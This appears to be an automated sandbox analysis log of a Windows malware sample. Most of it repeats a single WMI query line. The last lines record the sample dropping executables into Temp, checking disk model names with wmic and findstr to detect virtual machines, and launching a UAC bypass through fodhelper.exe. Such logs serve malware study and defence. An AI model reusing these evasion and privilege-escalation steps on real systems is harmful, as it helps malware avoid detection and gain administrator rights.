        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: e7WMhx18XN.exeReversingLabs: Detection: 52%
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknownProcess created: C:\Users\user\Desktop\e7WMhx18XN.exe "C:\Users\user\Desktop\e7WMhx18XN.exe"
        Source: unknownProcess created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeProcess created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
